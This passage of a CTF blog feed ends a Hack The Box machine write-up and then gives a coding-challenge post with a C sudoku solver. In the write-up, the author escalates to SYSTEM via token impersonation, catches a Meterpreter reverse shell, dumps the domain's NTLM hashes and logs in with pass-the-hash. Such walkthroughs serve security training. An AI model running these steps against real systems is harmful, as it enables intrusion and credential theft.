[*] DCOM obj OID: 0x6f622a7f1f5eff74
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 912 Token:0x204  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 6652</code></pre></div><p>Then we can just hashdump!!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">meterpreter &gt; bg
[*] Backgrounding session 1...
msf exploit(multi/handler) &gt; exploit
[*] Started reverse TCP handler on 10.10.15.169:9002 
[*] Sending stage (232006 bytes) to 10.129.11.224
[*] Meterpreter session 2 opened (10.10.15.169:9002 -&gt; 10.129.11.224:58924) at 2026-04-01 10:40:26 -0400

meterpreter &gt; getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter &gt; hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ebb948d32f7e896aa0d3934ec7a1b868:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:051e1c9e689e7e4c9fb7164433b9ba8e:::
Claire.Pope:1105:aad3b435b51404eeaad3b435b51404ee:407269bacd94665e972e2c61c1de7a15:::
Julia.Wong:1106:aad3b435b51404eeaad3b435b51404ee:b4c8a5ef4dd292edd06b613d2c518ddc:::
Hilary.Reed:1107:aad3b435b51404eeaad3b435b51404ee:39da4813065bd52215fb5614b956873b:::
Diana.Pope:1108:aad3b435b51404eeaad3b435b51404ee:ee1458cde3182d47514a107afd1236f2:::
Jasmine.Price:1109:aad3b435b51404eeaad3b435b51404ee:4c8c779f1e48435bb0bf235afd921988:::
George.Williams:1110:aad3b435b51404eeaad3b435b51404ee:8a3891bd96479611d4eec391ca592519:::
Lawrence.Kaur:1111:aad3b435b51404eeaad3b435b51404ee:2ed316bf52a9f155fc25440fae777d0f:::
Jasmine.Slater:1112:aad3b435b51404eeaad3b435b51404ee:6df17991ea82048f8f03734f1f4449c8:::
Hugh.Watts:1113:aad3b435b51404eeaad3b435b51404ee:656f2dbe61c431b5ca58a1a5001d51f6:::
Christine.Bruce:1114:aad3b435b51404eeaad3b435b51404ee:74eeaab55e418b6247ea35db833da742:::
svc_mssql:1115:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
BREACHDC$:1000:aad3b435b51404eeaad3b435b51404ee:dd953936e414a1c2e1b4e1a062aa4a22:::
meterpreter &gt;</code></pre></div><p>That&#8217;s it, we can just logon with the same Metasploit or even PTH with the hash dump as Administrator.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap breachdc.breach.vl -u Administrator -H ebb948d32f7e896aa0d3934ec7a1b868
LDAP        10.129.11.224   389    BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.11.224   389    BREACHDC         [+] breach.vl\Administrator:ebb948d32f7e896aa0d3934ec7a1b868 (Pwn3d!)</code></pre></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!b_eZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad71633b-74b8-4e05-bc7d-a5f5f3d1d19f_880x465.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!b_eZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad71633b-74b8-4e05-bc7d-a5f5f3d1d19f_880x465.png 424w, https://substackcdn.com/image/fetch/$s_!b_eZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad71633b-74b8-4e05-bc7d-a5f5f3d1d19f_880x465.png 848w, https://substackcdn.com/image/fetch/$s_!b_eZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad71633b-74b8-4e05-bc7d-a5f5f3d1d19f_880x465.png 1272w, https://substackcdn.com/image/fetch/$s_!b_eZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad71633b-74b8-4e05-bc7d-a5f5f3d1d19f_880x465.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!b_eZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad71633b-74b8-4e05-bc7d-a5f5f3d1d19f_880x465.png" width="880" height="465" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ad71633b-74b8-4e05-bc7d-a5f5f3d1d19f_880x465.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:465,&quot;width&quot;:880,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:205370,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192855357?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad71633b-74b8-4e05-bc7d-a5f5f3d1d19f_880x465.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!b_eZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad71633b-74b8-4e05-bc7d-a5f5f3d1d19f_880x465.png 424w, https://substackcdn.com/image/fetch/$s_!b_eZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad71633b-74b8-4e05-bc7d-a5f5f3d1d19f_880x465.png 848w, https://substackcdn.com/image/fetch/$s_!b_eZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad71633b-74b8-4e05-bc7d-a5f5f3d1d19f_880x465.png 1272w, https://substackcdn.com/image/fetch/$s_!b_eZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fad71633b-74b8-4e05-bc7d-a5f5f3d1d19f_880x465.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ul><li><p><a href="https://labs.hackthebox.com/achievement/machine/2489228/766">labs.hackthebox.com/achievement/machine/2489228/766</a></p></li></ul><p>Until next time and Happy Hacking, together we make the Internet more bleeding!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[HTB Sudoking - Coding]]></title><description><![CDATA[Info: See who has claimed the blood for this challenge.]]></description><link>https://byt3n33dl3.substack.com/p/htb-sudoking-coding</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/htb-sudoking-coding</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Tue, 31 Mar 2026 09:00:14 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!YSjT!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fedf64747-aaf3-4049-8ac5-ce5c3f773012_880x387.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!YSjT!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fedf64747-aaf3-4049-8ac5-ce5c3f773012_880x387.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!YSjT!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fedf64747-aaf3-4049-8ac5-ce5c3f773012_880x387.png 424w, https://substackcdn.com/image/fetch/$s_!YSjT!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fedf64747-aaf3-4049-8ac5-ce5c3f773012_880x387.png 848w, https://substackcdn.com/image/fetch/$s_!YSjT!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fedf64747-aaf3-4049-8ac5-ce5c3f773012_880x387.png 1272w, https://substackcdn.com/image/fetch/$s_!YSjT!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fedf64747-aaf3-4049-8ac5-ce5c3f773012_880x387.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!YSjT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fedf64747-aaf3-4049-8ac5-ce5c3f773012_880x387.png" width="880" height="387" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/edf64747-aaf3-4049-8ac5-ce5c3f773012_880x387.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:387,&quot;width&quot;:880,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:137158,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192706119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fedf64747-aaf3-4049-8ac5-ce5c3f773012_880x387.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!YSjT!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fedf64747-aaf3-4049-8ac5-ce5c3f773012_880x387.png 424w, https://substackcdn.com/image/fetch/$s_!YSjT!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fedf64747-aaf3-4049-8ac5-ce5c3f773012_880x387.png 848w, https://substackcdn.com/image/fetch/$s_!YSjT!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fedf64747-aaf3-4049-8ac5-ce5c3f773012_880x387.png 1272w, https://substackcdn.com/image/fetch/$s_!YSjT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fedf64747-aaf3-4049-8ac5-ce5c3f773012_880x387.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>Sudoking (in C)</h2><p>See who has claimed the blood for this challenge.</p><p>Question:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c"># take in the number
n = input()

# calculate answer


# print answer
print(n)
</code></pre></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!zM49!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14cd47d4-1291-41e3-9e93-7fad13b78783_1920x1033.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!zM49!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14cd47d4-1291-41e3-9e93-7fad13b78783_1920x1033.png 424w, https://substackcdn.com/image/fetch/$s_!zM49!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14cd47d4-1291-41e3-9e93-7fad13b78783_1920x1033.png 848w, https://substackcdn.com/image/fetch/$s_!zM49!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14cd47d4-1291-41e3-9e93-7fad13b78783_1920x1033.png 1272w, https://substackcdn.com/image/fetch/$s_!zM49!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14cd47d4-1291-41e3-9e93-7fad13b78783_1920x1033.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!zM49!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14cd47d4-1291-41e3-9e93-7fad13b78783_1920x1033.png" width="1456" height="783" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/14cd47d4-1291-41e3-9e93-7fad13b78783_1920x1033.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:783,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:121704,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192706119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14cd47d4-1291-41e3-9e93-7fad13b78783_1920x1033.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!zM49!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14cd47d4-1291-41e3-9e93-7fad13b78783_1920x1033.png 424w, https://substackcdn.com/image/fetch/$s_!zM49!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14cd47d4-1291-41e3-9e93-7fad13b78783_1920x1033.png 848w, https://substackcdn.com/image/fetch/$s_!zM49!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14cd47d4-1291-41e3-9e93-7fad13b78783_1920x1033.png 1272w, https://substackcdn.com/image/fetch/$s_!zM49!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14cd47d4-1291-41e3-9e93-7fad13b78783_1920x1033.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Answer:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">#include &lt;stdio.h&gt;

int grid[9][9];

int valid(int row, int col, int num) {
    for (int i = 0; i &lt; 9; i++) {
        if (grid[row][i] == num) return 0;
        if (grid[i][col] == num) return 0;
    }
    int r = (row / 3) * 3, c = (col / 3) * 3;
    for (int i = 0; i &lt; 3; i++)
        for (int j = 0; j &lt; 3; j++)
            if (grid[r+i][c+j] == num) return 0;
    return 1;
}

int solve() {
    for (int i = 0; i &lt; 9; i++) {
        for (int j = 0; j &lt; 9; j++) {
            if (grid[i][j] == 0) {
                for (int num = 1; num &lt;= 9; num++) {
                    if (valid(i, j, num)) {
                        grid[i][j] = num;
                        if (solve()) return 1;
                        grid[i][j] = 0;
                    }
                }
                return 0;
            }
        }
    }
    return 1;
}

void parse() {
    char line[50];
    int row = 0;
    while (fgets(line, sizeof(line), stdin)) {
        if (line[0] == '+') continue;
        int col = 0;
        for (int i = 0; line[i] &amp;&amp; col &lt; 9; i++) {
            if (line[i] == '.') grid[row][col++] = 0;
            else if (line[i] &gt;= '1' &amp;&amp; line[i] &lt;= '9') grid[row][col++] = line[i] - '0';
        }
        row++;
    }
}

void print_grid() {
    for (int i = 0; i &lt; 9; i++) {
        if (i % 3 == 0) printf("+-------+-------+-------+\n");
        for (int j = 0; j &lt; 9; j++) {
            if (j % 3 == 0) printf("| ");
            printf("%d ", grid[i][j]);
        }
        printf("|\n");
    }
    printf("+-------+-------+-------+\n");
}

int main() {
    parse();
    solve();
    print_grid();
    return 0;
}</code></pre></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!HqKy!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5efebcdf-45e3-4761-a3f2-c9c6125809d2_1920x1033.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!HqKy!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5efebcdf-45e3-4761-a3f2-c9c6125809d2_1920x1033.png 424w, https://substackcdn.com/image/fetch/$s_!HqKy!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5efebcdf-45e3-4761-a3f2-c9c6125809d2_1920x1033.png 848w, https://substackcdn.com/image/fetch/$s_!HqKy!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5efebcdf-45e3-4761-a3f2-c9c6125809d2_1920x1033.png 1272w, https://substackcdn.com/image/fetch/$s_!HqKy!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5efebcdf-45e3-4761-a3f2-c9c6125809d2_1920x1033.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!HqKy!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5efebcdf-45e3-4761-a3f2-c9c6125809d2_1920x1033.png" width="1456" height="783" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5efebcdf-45e3-4761-a3f2-c9c6125809d2_1920x1033.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:783,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:164956,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192706119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5efebcdf-45e3-4761-a3f2-c9c6125809d2_1920x1033.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!HqKy!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5efebcdf-45e3-4761-a3f2-c9c6125809d2_1920x1033.png 424w, https://substackcdn.com/image/fetch/$s_!HqKy!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5efebcdf-45e3-4761-a3f2-c9c6125809d2_1920x1033.png 848w, https://substackcdn.com/image/fetch/$s_!HqKy!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5efebcdf-45e3-4761-a3f2-c9c6125809d2_1920x1033.png 1272w, https://substackcdn.com/image/fetch/$s_!HqKy!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5efebcdf-45e3-4761-a3f2-c9c6125809d2_1920x1033.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Happy Hacking!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[HTB Oddly Even - Coding]]></title><description><![CDATA[Info: See who has claimed the blood for this challenge.]]></description><link>https://byt3n33dl3.substack.com/p/htb-oddly-even-coding</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/htb-oddly-even-coding</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Tue, 31 Mar 2026 08:39:46 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!xyRy!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc9b4379-4abf-4bce-bb96-cb8a98667599_880x391.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!xyRy!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc9b4379-4abf-4bce-bb96-cb8a98667599_880x391.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!xyRy!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc9b4379-4abf-4bce-bb96-cb8a98667599_880x391.png 424w, 